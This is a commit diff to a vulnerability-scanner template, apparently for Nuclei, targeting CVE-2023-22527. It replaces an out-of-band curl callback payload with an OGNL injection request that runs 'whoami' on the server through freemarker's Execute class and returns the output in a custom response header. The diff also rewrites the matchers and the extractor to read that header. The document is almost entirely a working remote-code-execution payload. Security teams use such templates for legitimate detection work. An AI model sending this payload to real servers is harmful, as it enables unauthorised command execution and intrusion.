Updated payload to execute whoami and print the output

2024-01-24 01:58:11 +05:30 · 2024-01-24 01:58:11 +05:30 · 91df84650d
parent aba6b4ed2d
commit 91df84650d
1 changed files with 10 additions and 9 deletions
--- a/http/cves/2023/CVE-2023-22527.yaml
+++ b/http/cves/2023/CVE-2023-22527.yaml
@ -33,15 +33,16 @@ http:
        Accept-Encoding: gzip, deflate, br
        Content-Type: application/x-www-form-urlencoded

-        label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=(new freemarker.template.utility.Execute()).exec({"curl {{interactsh-url}}"})
+        label=aaa\u0027%2b#request.get(\u0027.KEY_velocity.struts2.context\u0027).internalGet(\u0027ognl\u0027).findValue(#parameters.poc[0],{})%2b\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\u0027x_vuln_check\u0027,(new+freemarker.template.utility.Execute()).exec({"whoami"}))

-    matchers-condition: and
    matchers:
-      - type: word
-        words:
-          - 'Empty{name='
+      - type: dsl
+        dsl:
+          - x_vuln_check != "" # check for custom header key exists
+          - contains(to_lower(body), 'empty{name=')
+        condition: and

-      - type: word
-        part: interactsh_protocol
-        words:
-          - dns
+    extractors:
+      - type: dsl
+        dsl:
+          - x_vuln_check # prints the output of whoami